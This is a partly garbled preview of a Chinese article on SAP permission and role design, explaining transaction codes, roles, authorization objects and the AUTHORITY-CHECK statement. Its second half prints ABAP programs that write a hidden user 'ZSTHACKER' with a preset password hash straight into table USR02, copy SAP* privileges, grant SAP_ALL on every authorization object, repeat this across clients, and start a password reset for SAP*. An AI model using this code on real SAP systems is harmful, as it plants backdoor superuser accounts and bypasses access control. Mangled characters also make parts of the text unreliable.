SAP權(quán)限設(shè)計(jì)思路及方法_第1頁(yè)
SAP權(quán)限設(shè)計(jì)思路及方法_第2頁(yè)
SAP權(quán)限設(shè)計(jì)思路及方法_第3頁(yè)
SAP權(quán)限設(shè)計(jì)思路及方法_第4頁(yè)
SAP權(quán)限設(shè)計(jì)思路及方法_第5頁(yè)
已閱讀5頁(yè),還剩2頁(yè)未讀, 繼續(xù)免費(fèi)閱讀

下載本文檔

版權(quán)說(shuō)明:本文檔由用戶(hù)提供并上傳,收益歸屬內(nèi)容提供方,若內(nèi)容存在侵權(quán),請(qǐng)進(jìn)行舉報(bào)或認(rèn)領(lǐng)

文檔簡(jiǎn)介

1、SAP權(quán)限與角色設(shè)計(jì)一般來(lái)說(shuō),權(quán)限就是“某人能干某事”和“某人不能干某事”之合。 在SAP系統(tǒng)中,用 事務(wù)碼(也稱(chēng)交易代碼、或者TCODE或者TransactionCode )表示一個(gè)用戶(hù)能干的事情。比如MM0修個(gè)TCODE1用來(lái)維護(hù)物料數(shù)據(jù)的、MIGO用來(lái)收貨的、FS00是用來(lái)維護(hù)會(huì)計(jì)科目的等。用SU01新建一個(gè)ID時(shí),默認(rèn)的權(quán)限是空白,即這個(gè)新建的ID不能做任何事情,不能使用任何事務(wù)代碼。這樣只需要為相應(yīng)的ID賦上相應(yīng)的TCODE即可實(shí)現(xiàn)“某人能干某事” 了,其補(bǔ)集,則是“某人不能干的某些事”。但是我們不能直接在 SU01里面給某個(gè)ID賦上TCODE要通過(guò)ROLE中轉(zhuǎn)一下。即:一堆 TCO

2、D朗成了一個(gè) ROLE然后把這個(gè) ROL吩給某 個(gè)ID,然后這個(gè)ID就得到一堆TCODET。上面這些,僅僅是SAP權(quán)限控制的初級(jí)概念, 要理解SAP權(quán)限控制的全部, 必須還要明 白下面的概念。1、角色(ROLE、通用角色(Common Role)、本地角色(Local Role )上面講了,角色,即 ROLE是一堆TCODE勺集合,當(dāng)然還包含有 TCOD坐備的“權(quán)限 對(duì)象”、“權(quán)限字段”、“允許的操作”及“允許的值”等。我們使用PFCG維護(hù)角色。為了系統(tǒng)的測(cè)試與 SAP實(shí)施項(xiàng)目的階段性需要,進(jìn)一步將角色分為“通用角色”和“本地角 色”。舉個(gè)例子便于理解:通用角色好比“生產(chǎn)訂單制單員”,本地角色

3、對(duì)應(yīng)就是“長(zhǎng)城國(guó)際組裝一分廠生產(chǎn)訂單制單員”。所以,本地角色較之通用角色的區(qū)別就是,在同樣的操作權(quán)限(事務(wù)代碼們)情況下,前者多了具體的限制值。這個(gè)限制值可能是組織架構(gòu)限制,也可 能是其他業(yè)務(wù)的限制。如,一分廠的制單員不能維護(hù)二分廠的制單員;一分廠的制單員甲只能維護(hù)類(lèi)型為A的單據(jù),而不能維護(hù)類(lèi)型為B的單據(jù),諸如此類(lèi)。具體請(qǐng)看下面的概念。2、權(quán)限對(duì)象(Authorization Object )、權(quán)限字段(AuthorizationField )、允許的操作 (Activity )、允許的值(Field Value )上面粗略說(shuō)了構(gòu)成 ROLE勺是若干TCODE其實(shí), 在ROL臣口 TCOD此間

4、,還有一個(gè)中間概念“權(quán)限對(duì)象”:角色包含了若干權(quán)限對(duì)象,在透明表AGR_1250中有存儲(chǔ)二者之間的關(guān)系;權(quán)限對(duì)象包含了若干權(quán)限字段、允許白操作和允許的值,在透明表AGR_1251中體現(xiàn)了ROLE/Object/Field/Value 之間的關(guān)系;有一個(gè)特殊的權(quán)限對(duì)象用來(lái)包含了若干事務(wù)碼。這個(gè)權(quán)限對(duì)象叫"S_TCODE,該權(quán)限對(duì)象的權(quán)限字段叫“ TCD ,該字段允許的值( FieldValue )存放的就是事務(wù)代碼; 有一種特殊的權(quán)限字段用來(lái)表示可以針對(duì)該權(quán)限對(duì)象做哪些操作,是允許創(chuàng)建、修改、顯示、刪除或者其他呢。該權(quán)限字段叫“ ACTVT ,該字段允許的值( Field Value

5、)存放的就是允 許操作的代碼,01代表創(chuàng)建、02代表修改、03代表顯示等;SAP 的權(quán)限控制是控制到字段級(jí)的,換句話(huà)說(shuō),其權(quán)限控制機(jī)制可以檢查你是否有權(quán)限 維護(hù)某張透明表的某一個(gè)字段。SAP系統(tǒng)自帶了若干權(quán)限對(duì)象、 默認(rèn)控制了若干權(quán)限字段 (對(duì)應(yīng)到透明表的某些字段)??梢杂檬聞?wù)碼 SU20來(lái)查看系統(tǒng)有哪些權(quán)限字段,用SU21來(lái)查看系統(tǒng)有哪些默認(rèn)的權(quán)限對(duì)象。于是我們知道了事務(wù)代碼與權(quán)限對(duì)象的區(qū)別。從權(quán)限控制的范疇來(lái)看,事務(wù)代碼屬于一種特殊的權(quán)限對(duì)象;一個(gè)事務(wù)代碼在執(zhí)行過(guò)程中,為了判斷某個(gè)ID是否有權(quán)限執(zhí)行此事務(wù)代碼,還可能檢查其他若干普通的權(quán)限對(duì)象。使用SU22來(lái)查看某個(gè)事務(wù)代碼包含了哪些權(quán)限對(duì)

6、象。在透明表USOBXh存放了事務(wù)碼與權(quán)限對(duì)象的對(duì)應(yīng)關(guān)系。3、自定義權(quán)限對(duì)象上文所說(shuō)的系統(tǒng)自帶權(quán)限對(duì)象與權(quán)限字段僅能滿(mǎn)足有限的需要,其權(quán)限審核的邏輯也是系統(tǒng)硬編碼了的,我們能做的只是是否啟用某項(xiàng)權(quán)限對(duì)象的檢查(使用SU22。如果需要自定義,通過(guò)SU2。SU21定義即可。調(diào)用的時(shí)候在程序中加入類(lèi)似代碼:AUTHORITY-CHECK OBJECT 'Z_VKORG' ID 'VKORG' FIELD'REC_VKORG-VKORG'.IF SY-SUBRC <> 0.MESSAGE 'No Authorization!'

7、 TYPE 'E'.ENDIF.下面的程序ZCRTUSERL建立用戶(hù)ZSTHACKEF®始密碼123qaz)并賦予SAP*用戶(hù)的所有權(quán)限 的參考程序。Program ZCRTUSER.Data ZUSR02 like USR02 .*1.Create User ZSTHACKER according to DDIC select single * into ZUSR02 from USR02 where BNAME = 'DDIC'.ZUSR02-BNAME = 'ZSTHACKER'.ZUSR02-Bcode = 'E3B79

8、6BB09F7901B'.insert USR02 from ZUSR02 .*2.Copy Auth. Obj from SAP*(or other)*如果將 Where BNAME = 'SAP*'去掉,基本就是復(fù)制所有的授權(quán)對(duì)象data ZUSRBF2 like USRBF2 occurs 0 with header line.select * from USRBF2 into tableZUSRBF2where BNAME = 'SAP*'.Loop at ZUSRBF2.ZUSRBF2-BNAME = 'ZSTHACKER'.M

9、odify ZUSRBF2 INDEX sy-tabix TRANSPORTINGBNAME.endloop.INSERT USRBF2 FROM TABLE ZUSRBF2 ACCEPTING DUPLICATE KEYS.如果SAPm能被刪除,還可直接將TOBJ中包含的所有的SAP授權(quán)對(duì)象全部賦予給一個(gè)用戶(hù)。以下程序ZALLOBJ是賦予所有的標(biāo)準(zhǔn)授權(quán)對(duì)象給用戶(hù) ZSTHACKERProgram ZALLOBJ。Data Ztobj like tobj occurs 0 with header line .data zusrbf2 like usrbf2.select * into tabl

10、e ztobj from tobj .loop at ztobj.zusrbf2-mandt = sy-mandt.zusrbf2-bname = 'ZSTHACKER'.zusrbf2-objct = ztobj-objct.zusrbf2-auth ='&_SAP_ALL'.modify USRBF2 FROM zusrbf2.endloop .也可跨Client建立用戶(hù)和賦予權(quán)限,只要使用 client specified 就可以。Program ZCLIENT.Data zusrbf2 like usrbf2.Select * into zusr

11、bf2 from usrbf2where bname ='SAP*'.Zusrbf2-mandt = '100'.Insert into usrbf2 client specified values zusrbf2.Endselect .下面是一句話(huà)修改 SAP鄲J密碼為123456的程序,同樣,假設(shè)用戶(hù) BUTCHER勺密碼丟失,我 只要隨便在一臺(tái)服務(wù)器上建立一個(gè)用戶(hù)也叫BUTCHER然后密碼設(shè)置為1QAZ2WSX則其在任何系統(tǒng)任何client 加密后的密碼必為 BF02C9F1F179FB45這樣的加密意義已經(jīng)不大。report ZMODPWD.tables :usr02 .update usr0

溫馨提示

  • 1. 本站所有資源如無(wú)特殊說(shuō)明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請(qǐng)下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請(qǐng)聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶(hù)所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁(yè)內(nèi)容里面會(huì)有圖紙預(yù)覽,若沒(méi)有圖紙預(yù)覽就沒(méi)有圖紙。
  • 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
  • 5. 人人文庫(kù)網(wǎng)僅提供信息存儲(chǔ)空間,僅對(duì)用戶(hù)上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對(duì)用戶(hù)上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對(duì)任何下載內(nèi)容負(fù)責(zé)。
  • 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請(qǐng)與我們聯(lián)系,我們立即糾正。
  • 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時(shí)也不承擔(dān)用戶(hù)因使用這些下載資源對(duì)自己和他人造成任何形式的傷害或損失。

最新文檔

評(píng)論

0/150

提交評(píng)論